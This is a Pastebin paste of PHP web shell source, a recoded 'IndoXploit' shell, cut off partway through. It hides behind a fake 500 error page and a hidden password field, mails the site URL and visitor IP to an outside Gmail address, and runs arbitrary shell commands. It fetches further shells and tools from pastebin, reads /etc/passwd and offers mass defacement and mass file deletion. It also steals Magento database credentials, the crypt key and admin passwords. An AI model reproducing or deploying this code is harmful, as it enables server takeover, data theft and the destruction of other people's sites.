API tools faq
paste
Guest User

Untitled

a guest
Jun 7th, 2018
470
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 82.49 KB | None | 0 0
raw download clone embed print report
  1.  
  2. <?php
  3. @session_start();
  4. @error_reporting(0);
  5. @error_log(0);
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11. @set_time_limit(0);
  12. @set_magic_quotes_runtime(0);
  13. $lol="170fca09beb300a91e64fa0530e87a7f";
  14. $tujuanmail = 'skacauska2@gmail.com';
  15. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  16. $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
  17. mail($tujuanmail, "Dont Change This!!", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
  18. function printLogin() {
  19. ?>
  20. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  21. <html><head>
  22. <title>500 Internal Server Error</title>
  23. </head><body>
  24. <h1>Internal Server Error</h1>
  25. <p>The server encountered an internal error or
  26. misconfiguration and was unable to complete
  27. your request.</p>
  28. <p>Please contact the server administrator and inform them of the time the error occurred,
  29. and anything you might have done that may have
  30. caused the error.</p>
  31. <p>More information about this error may be available
  32. in the server error log.</p>
  33. </body></html>
  34.  
  35. <br>
  36. <br>
  37. <br>
  38. <br>
  39. <br>
  40. </style>
  41. </head>
  42. <style>
  43. input { margin:0;background-color:#fff;border:1px solid #fff; }
  44. </style>
  45. <center>
  46. <form method=post>
  47. <input type=password name=tokeichun>
  48. </form></center>
  49. <?php
  50. exit;
  51. }
  52. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  53. if( empty( $lol ) ||
  54. ( isset( $_POST['tokeichun'] ) && ( md5($_POST['tokeichun']) == $lol ) ) )
  55. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  56. else
  57. printLogin();
  58. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  59. @ob_clean();
  60. $file = $_GET['file'];
  61. header('Content-Description: File Transfer');
  62. header('Content-Type: application/octet-stream');
  63. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  64. header('Expires: 0');
  65. header('Cache-Control: must-revalidate');
  66. header('Pragma: public');
  67. header('Content-Length: ' . filesize($file));
  68. readfile($file);
  69. exit;
  70. }
  71.  
  72. ?>
  73. <html>
  74. <head>
  75. <title></title>
  76. <meta name='author' content='IndoXploit Recoded By Mr.ToKeiChun69'>
  77. <meta charset="UTF-8">
  78. <style type='text/css'>
  79. @import url(https://fonts.googleapis.com/css?family=Abel);
  80. html {
  81. background: #000000;
  82. color: #ffffff;
  83. font-family: 'Abel';
  84. font-size: 13px;
  85. width: 100%;
  86. }
  87. li {
  88. display: inline;
  89. margin: 5px;
  90. padding: 5px;
  91. }
  92. table, th, td {
  93. border-collapse:collapse;
  94. font-family: Tahoma, Geneva, sans-serif;
  95. background: transparent;
  96. font-family: 'Abel';
  97. font-size: 13px;
  98. }
  99. .table_home, .th_home, .td_home {
  100. border: 1px solid #ffffff;
  101. }
  102. th {
  103. padding: 10px;
  104. }
  105. a {
  106. color: #ffffff;
  107. text-decoration: none;
  108. }
  109. a:hover {
  110. color: gold;
  111. text-decoration: underline;
  112. }
  113. b {
  114. color: gold;
  115. }
  116. input[type=text], input[type=password],input[type=submit] {
  117. background: transparent;
  118. color: #ffffff;
  119. border: 1px solid #ffffff;
  120. margin: 5px auto;
  121. padding-left: 5px;
  122. font-family: 'Abel';
  123. font-size: 13px;
  124. }
  125. textarea {
  126. border: 1px solid #ffffff;
  127. width: 100%;
  128. height: 400px;
  129. padding-left: 5px;
  130. margin: 10px auto;
  131. resize: none;
  132. background: transparent;
  133. color: #ffffff;
  134. font-family: 'Abel';
  135. font-size: 13px;
  136. }
  137. select {
  138. background: transparent;
  139. color: #ffffff;
  140. border: 1px solid #ffffff;
  141. margin: 5px auto;
  142. padding-left: 5px;
  143. font-family: 'Abel';
  144. font-size: 13px;
  145. }
  146. .but {
  147. background: transparent;
  148. color: #ffffff;
  149. border: 1px solid #ffffff;
  150. margin: 5px auto;
  151. padding-left: 5px;
  152. font-family: 'Abel';
  153. font-size: 13px;
  154. }
  155. </style>
  156. </head>
  157. <?php
  158. if (file_exists("php.ini")){
  159. }else{
  160. $img = fopen('php.ini', 'w');
  161. $sec = "safe_mode = OFF
  162. disable_funtions = NONE";
  163. fwrite($img ,$sec);
  164. fclose($img);}
  165. function w($dir,$perm) {
  166. if(!is_writable($dir)) {
  167. return "<font color=red>".$perm."</font>";
  168. } else {
  169. return "<font color=lime>".$perm."</font>";
  170. }
  171. }
  172. function UrlLoop($url,$type){
  173.  
  174. $urlArray = array();
  175.  
  176. $ch = curl_init();
  177. curl_setopt($ch, CURLOPT_URL, $url);
  178. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  179. $result = curl_exec($ch);
  180.  
  181. $regex='|<a.*?href="(.*?)"|';
  182. preg_match_all($regex,$result,$parts);
  183. $links=$parts[1];
  184. foreach($links as $link){
  185. array_push($urlArray, $link);
  186. }
  187. curl_close($ch);
  188.  
  189. foreach($urlArray as $value){
  190. $lol="$url$value";
  191. if(preg_match("#$type#is", $lol)) {
  192. echo "$lol\r\n";
  193. }
  194. }
  195. }
  196. function exe($cmd) {
  197. if(function_exists('system')) {
  198. @ob_start();
  199. @system($cmd);
  200. $buff = @ob_get_contents();
  201. @ob_end_clean();
  202. return $buff;
  203. } elseif(function_exists('exec')) {
  204. @exec($cmd,$results);
  205. $buff = "";
  206. foreach($results as $result) {
  207. $buff .= $result;
  208. } return $buff;
  209. } elseif(function_exists('passthru')) {
  210. @ob_start();
  211. @passthru($cmd);
  212. $buff = @ob_get_contents();
  213. @ob_end_clean();
  214. return $buff;
  215. } elseif(function_exists('shell_exec')) {
  216. $buff = @shell_exec($cmd);
  217. return $buff;
  218. }
  219. }
  220. function perms($file){
  221. $perms = fileperms($file);
  222. if (($perms & 0xC000) == 0xC000) {
  223. $info = 's';
  224. } elseif (($perms & 0xA000) == 0xA000) {
  225. $info = 'l';
  226. } elseif (($perms & 0x8000) == 0x8000) {
  227. $info = '-';
  228. } elseif (($perms & 0x6000) == 0x6000) {
  229. $info = 'b';
  230. } elseif (($perms & 0x4000) == 0x4000) {
  231. $info = 'd';
  232. } elseif (($perms & 0x2000) == 0x2000) {
  233. $info = 'c';
  234. } elseif (($perms & 0x1000) == 0x1000) {
  235. $info = 'p';
  236. } else {
  237. $info = 'u';
  238. }
  239. $info .= (($perms & 0x0100) ? 'r' : '-');
  240. $info .= (($perms & 0x0080) ? 'w' : '-');
  241. $info .= (($perms & 0x0040) ?
  242. (($perms & 0x0800) ? 's' : 'x' ) :
  243. (($perms & 0x0800) ? 'S' : '-'));
  244. $info .= (($perms & 0x0020) ? 'r' : '-');
  245. $info .= (($perms & 0x0010) ? 'w' : '-');
  246. $info .= (($perms & 0x0008) ?
  247. (($perms & 0x0400) ? 's' : 'x' ) :
  248. (($perms & 0x0400) ? 'S' : '-'));
  249. $info .= (($perms & 0x0004) ? 'r' : '-');
  250. $info .= (($perms & 0x0002) ? 'w' : '-');
  251. $info .= (($perms & 0x0001) ?
  252. (($perms & 0x0200) ? 't' : 'x' ) :
  253. (($perms & 0x0200) ? 'T' : '-'));
  254. return $info;
  255. }
  256. function hdd($s) {
  257. if($s >= 1073741824)
  258. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  259. elseif($s >= 1048576)
  260. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  261. elseif($s >= 1024)
  262. return sprintf('%1.2f',$s / 1024 ) .' KB';
  263. else
  264. return $s .' B';
  265. }
  266. function ambilKata($param, $kata1, $kata2){
  267. if(strpos($param, $kata1) === FALSE) return FALSE;
  268. if(strpos($param, $kata2) === FALSE) return FALSE;
  269. $start = strpos($param, $kata1) + strlen($kata1);
  270. $end = strpos($param, $kata2, $start);
  271. $return = substr($param, $start, $end - $start);
  272. return $return;
  273. }
  274. if(get_magic_quotes_gpc()) {
  275. function idx_ss($array) {
  276. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  277. }
  278. $_POST = idx_ss($_POST);
  279. }
  280. function CreateTools($names,$lokasi){
  281. if ( $_GET['create'] == $names ){
  282. $a= "".$_SERVER['SERVER_NAME']."";
  283. $b= dirname($_SERVER['PHP_SELF']);
  284. $c = "/tkc_tools/".$names.".php";
  285. if (file_exists('tkc_tools/'.$names.'.php')){
  286. echo '<script type="text/javascript">alert("Done");window.location.href = "tkc_tools/'.$names.'.php";</script> ';
  287. }
  288. else {mkdir("tkc_tools", 0777);
  289. file_put_contents('tkc_tools/'.$names.'.php', file_get_contents($lokasi));
  290. echo ' <script type="text/javascript">alert("Done");window.location.href = "tkc_tools/'.$names.'.php";</script> ';}}}
  291.  
  292. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  293. CreateTools("adminer","https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  294. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  295. CreateTools("scanner","https://pastebin.com/raw/N6iBqjEA");
  296. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  297. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  298. CreateTools("vhost","https://pastebin.com/raw/zDgukLLX");
  299. CreateTools("grabber","https://pastebin.com/raw/qecAJ1tV");
  300. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  301. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  302. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  303. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  304. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  305. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  306. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  307. CreateTools("extractor","http://pastebin.com/raw/dBYyB7S5");
  308. CreateTools("bh","http://pastebin.com/raw/A8TupKkC");
  309. CreateTools("dhanus","http://pastebin.com/raw/W99Pvk3C");
  310. if(isset($_GET['dir'])) {
  311. $dir = $_GET['dir'];
  312. chdir($_GET['dir']);
  313. } else {
  314. $dir = getcwd();
  315. }
  316. $dir = str_replace("\\","/",$dir);
  317. $scdir = explode("/", $dir);
  318. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  319. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  320. $ds = @ini_get("disable_functions");
  321. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  322. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  323. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  324. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  325. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  326. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  327. if(!function_exists('posix_getegid')) {
  328. $user = @get_current_user();
  329. $uid = @getmyuid();
  330. $gid = @getmygid();
  331. $group = "?";
  332. } else {
  333. $uid = @posix_getpwuid(posix_geteuid());
  334. $gid = @posix_getgrgid(posix_getegid());
  335. $user = $uid['name'];
  336. $uid = $uid['uid'];
  337. $group = $gid['name'];
  338. $gid = $gid['gid'];
  339. }
  340. $d0mains = @file("/etc/named.conf");
  341. $users=@file('/etc/passwd');
  342. if($d0mains)
  343. {
  344. $count;
  345. foreach($d0mains as $d0main)
  346. {
  347. if(@ereg("zone",$d0main))
  348. {
  349. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  350. flush();
  351. if(strlen(trim($domains[1][0])) > 2)
  352. {
  353. flush();
  354. $count++;
  355. }
  356. }
  357. }
  358. }
  359.  
  360. $sport=$_SERVER['SERVER_PORT'];
  361. echo "<table style='width:100%'>";
  362. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  363. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  364. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  365. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  366. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  367. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
  368. echo "<tr><td>Safe Mode: $sm</td></tr>";
  369. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  370.  
  371. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  372. echo "<tr><td>Current DIR: ";
  373. foreach($scdir as $c_dir => $cdir) {
  374. echo "<a href='?dir=";
  375. for($i = 0; $i <= $c_dir; $i++) {
  376. echo $scdir[$i];
  377. if($i != $c_dir) {
  378. echo "/";
  379. }
  380. }
  381. echo "'>$cdir</a>/";
  382. }
  383. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
  384. echo "<form method='post'>
  385. <font style='text-decoration: none;'> ~ $ </font>
  386. <input type='text' size='20' height='10' name='cmd'><input type='submit' name='do_cmd' value='X'>
  387. </form>";
  388. if($_POST['do_cmd']) {
  389. echo "<pre>".exe($_POST['cmd'])."</pre>";
  390. }
  391. if($_POST['upload']) {
  392. if($_POST['tipe_upload'] == 'biasa') {
  393. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  394. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  395. } else {
  396. $act = "<font color=red>failed to upload file</font>";
  397. }
  398. } else {
  399. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  400. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  401. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  402. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  403. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  404. } else {
  405. $act = "<font color=red>failed to upload file</font>";
  406. }
  407. } else {
  408. $act = "<font color=red>failed to upload file</font>";
  409. }
  410. }
  411. }
  412. echo "
  413. <form method='post' enctype='multipart/form-data'>
  414. <input type='radio' name='tipe_upload' value='biasa' checked> ".w($dir,"Current")."
  415. <input type='radio' name='tipe_upload' value='home_root'> ".w($_SERVER['DOCUMENT_ROOT'],"Home")."
  416. <input type='file' name='ix_file'>
  417. <input type='submit' value='upload' name='upload'>
  418. </form>";
  419. echo $act;
  420.  
  421.  
  422. echo "<hr>";
  423. echo "<center>";
  424. echo "<ul>";
  425. echo "<li>[ <a href='?'>Home</a> ]</li>";
  426. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  427. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  428. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  429. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  430. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
  431. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  432. echo "<li>[ <a href='?dir=$dir&do=salto'>Emboh</a> ]</li>";
  433. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  434. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  435. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  436. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  437. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  438. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  439. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  440. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  441. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  442. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  443. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  444. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WP Auto Deface</a> ]</li>";
  445. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WP Auto Deface V.2</a> ]</li>";
  446. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WP Auto Edit User V.2</a> ]</li>";
  447. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  448. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypasser</a> ]<br></li>";
  449. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  450. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  451. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  452. echo "<li>[ <a href='?dir=$dir&do=tool'>Tools</a> ]</li>";
  453. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  454. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  455. echo "<li>[ <a href='?dir=$dir&do=symlink404'>Bypass Symlink 404</a> ]</li>";
  456. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  457. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  458. echo "</ul>";
  459. echo "</center>";
  460. echo "<hr>";
  461. if($_GET['do'] == 'upload') {
  462. echo "<center>";
  463. if($_POST['upload']) {
  464. if($_POST['tipe_upload'] == 'biasa') {
  465. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  466. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  467. } else {
  468. $act = "<font color=red>failed to upload file</font>";
  469. }
  470. } else {
  471. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  472. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  473. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  474. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  475. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  476. } else {
  477. $act = "<font color=red>failed to upload file</font>";
  478. }
  479. } else {
  480. $act = "<font color=red>failed to upload file</font>";
  481. }
  482. }
  483. }
  484. echo "Upload File:
  485. <form method='post' enctype='multipart/form-data'>
  486. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  487. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  488. <input type='file' name='ix_file'>
  489. <input type='submit' value='upload' name='upload'>
  490. </form>";
  491. echo $act;
  492. echo "</center>";
  493. }
  494. elseif($_GET['do'] == 'cmd') {
  495. if($_POST['do_cmd']) {
  496. echo "<pre>".exe($_POST['cmd'])."</pre>";
  497. }
  498. } elseif($_GET['do'] == 'mass_deface') {
  499. echo "<center><form action=\"\" method=\"post\">\n";
  500. $dirr=$_POST['d_dir'];
  501. $index = $_POST["script"];
  502. $index = str_replace('"',"'",$index);
  503. $index = stripslashes($index);
  504. function edit_file($file,$index){
  505. if (is_writable($file)) {
  506. clear_fill($file,$index);
  507. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  508. }
  509. else {
  510. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  511. }
  512. }
  513. function hapus_massal($dir,$namafile) {
  514. if(is_writable($dir)) {
  515. $dira = scandir($dir);
  516. foreach($dira as $dirb) {
  517. $dirc = "$dir/$dirb";
  518. $lokasi = $dirc.'/'.$namafile;
  519. if($dirb === '.') {
  520. if(file_exists("$dir/$namafile")) {
  521. unlink("$dir/$namafile");
  522. }
  523. } elseif($dirb === '..') {
  524. if(file_exists("".dirname($dir)."/$namafile")) {
  525. unlink("".dirname($dir)."/$namafile");
  526. }
  527. } else {
  528. if(is_dir($dirc)) {
  529. if(is_writable($dirc)) {
  530. if(file_exists($lokasi)) {
  531. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  532. unlink($lokasi);
  533. $idx = hapus_massal($dirc,$namafile);
  534. }
  535. }
  536. }
  537. }
  538. }
  539. }
  540. }
  541. function clear_fill($file,$index){
  542. if(file_exists($file)){
  543. $handle = fopen($file,'w');
  544. fwrite($handle,'');
  545. fwrite($handle,$index);
  546. fclose($handle); } }
  547.  
  548. function gass(){
  549. global $dirr , $index ;
  550. chdir($dirr);
  551. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  552. $files = scandir($dirr) ;
  553. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  554. sort($files);
  555. $n = 0 ;
  556. foreach ($files as $file){
  557. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  558. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  559. edit_file($file,$index);
  560. flush();
  561. $n = $n +1 ;
  562. }
  563. }
  564. echo "<br>";
  565. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  566. }
  567. function ListFiles($dirrall) {
  568.  
  569. if($dh = opendir($dirrall)) {
  570.  
  571. $files = Array();
  572. $inner_files = Array();
  573. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  574. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  575. while($file = readdir($dh)) {
  576. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  577. if(is_dir($dirrall . "/" . $file)) {
  578. $inner_files = ListFiles($dirrall . "/" . $file);
  579. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  580. } else {
  581. array_push($files, $dirrall . "/" . $file);
  582. }
  583. }
  584. }
  585.  
  586. closedir($dh);
  587. return $files;
  588. }
  589. }
  590. function gass_all(){
  591. global $index ;
  592. $dirrall=$_POST['d_dir'];
  593. foreach (ListFiles($dirrall) as $key=>$file){
  594. $file = str_replace('//',"/",$file);
  595. echo "<center><strong>$file</strong> ===>";
  596. edit_file($file,$index);
  597. flush();
  598. }
  599. $key = $key+1;
  600. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  601. function sabun_massal($dir,$namafile,$isi_script) {
  602. if(is_writable($dir)) {
  603. $dira = scandir($dir);
  604. foreach($dira as $dirb) {
  605. $dirc = "$dir/$dirb";
  606. $lokasi = $dirc.'/'.$namafile;
  607. if($dirb === '.') {
  608. file_put_contents($lokasi, $isi_script);
  609. } elseif($dirb === '..') {
  610. file_put_contents($lokasi, $isi_script);
  611. } else {
  612. if(is_dir($dirc)) {
  613. if(is_writable($dirc)) {
  614. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  615. file_put_contents($lokasi, $isi_script);
  616. $idx = sabun_massal($dirc,$namafile,$isi_script);
  617. }
  618. }
  619. }
  620. }
  621. }
  622. }
  623. if($_POST['mass'] == 'onedir') {
  624. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  625. $ini="http://";
  626. $mainpath=$_POST[d_dir];
  627. $file=$_POST[d_file];
  628. $dir=opendir("$mainpath");
  629. $code=base64_encode($_POST[script]);
  630. $indx=base64_decode($code);
  631. while($row=readdir($dir)){
  632. $start=@fopen("$row/$file","w+");
  633. $finish=@fwrite($start,$indx);
  634. if ($finish){
  635. echo"$ini$row/$file\n";
  636. }
  637. }
  638. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  639. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  640. $dir=opendir("$mainpath");
  641. $code=base64_encode($_POST[script]);
  642. $indx=base64_decode($code);
  643. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  644. $finish=@fwrite($start,$indx);
  645. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  646. }
  647.  
  648. }
  649. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  650. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  651. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  652. elseif($_POST['mass'] == 'massdeface') {
  653. echo "<div style='margin: 5px auto; padding: 5px'>";
  654. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  655. echo "</div>"; }
  656. else {
  657. echo "
  658. <center><font style='text-decoration: underline;'>
  659. Select Type:<br>
  660. </font>
  661. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  662. <option value=\"onedir\">Mass Deface 1 Dir</option>
  663. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  664. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  665. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  666. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  667. <font style='text-decoration: underline;'>Folder:</font><br>
  668. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  669. <font style='text-decoration: underline;'>Filename:</font><br>
  670. <input type='text' name='d_file' value='readthis.html' style='width: 450px;' height='10'><br>
  671. <font style='text-decoration: underline;'>Index File:</font><br>
  672. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.ToKeiChun69</textarea><br>
  673. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  674. </form></center>";
  675. }
  676. }
  677. elseif($_GET['do'] == 'magen') {
  678. echo'
  679. <div id="page-wrap">
  680. <center>
  681. <br>
  682. <FORM action="" method="post">
  683. <div align="center">[M A G E N T O] - Stealing Information<br>
  684. <div align="center">coder: sohai & n4KuLa_<br>
  685. <input type="hidden" name="form_action" value="2">
  686. </div>
  687. </div>
  688. ';
  689.  
  690.  
  691. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  692. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  693. if(isset($xml->global->resources->default_setup->connection)) {
  694. $connection = $xml->global->resources->default_setup->connection;
  695. $prefix = $xml->global->resources->db->table_prefix;
  696. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  697. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  698.  
  699. try {
  700. $app = Mage::app('default');
  701. Mage::getSingleton('core/session', array('name'=>'frontend'));
  702. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  703.  
  704. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  705. print("Could not connect: " . mysql_error());
  706. }
  707. mysql_select_db($connection->dbname);
  708. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  709.  
  710. $crypto = new Varien_Crypt_Mcrypt();
  711. $crypto->init($key);
  712.  
  713. //=========================================================================================================
  714. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  715. if (!$query){
  716. echo "<center><b>Gagal</b></center>";
  717. }else{
  718. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  719. echo'<br><br>
  720. ====================================================================<br>
  721. [ Admin FROM website : '.$site['website'].'] <br>
  722. ====================================================================<br>';
  723. }
  724. echo "
  725. <table border='1' align='center' >
  726. <tr>
  727. <td>id</td>
  728. <td>firstname</td>
  729. <td>lastname</td>
  730. <td>email</td>
  731. <td>username</td>
  732. <td>password</td>
  733. </tr>";
  734. while($vx = mysql_fetch_array($query)) {
  735. $no = 1;
  736. $user_id = $vx['user_id'];
  737. $username = $vx['username'];
  738. $password = $vx['password'];
  739. $email = $vx['email'];
  740. $firstname = $vx['firstname'];
  741. $lastname = $vx['lastname'];
  742. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  743. }
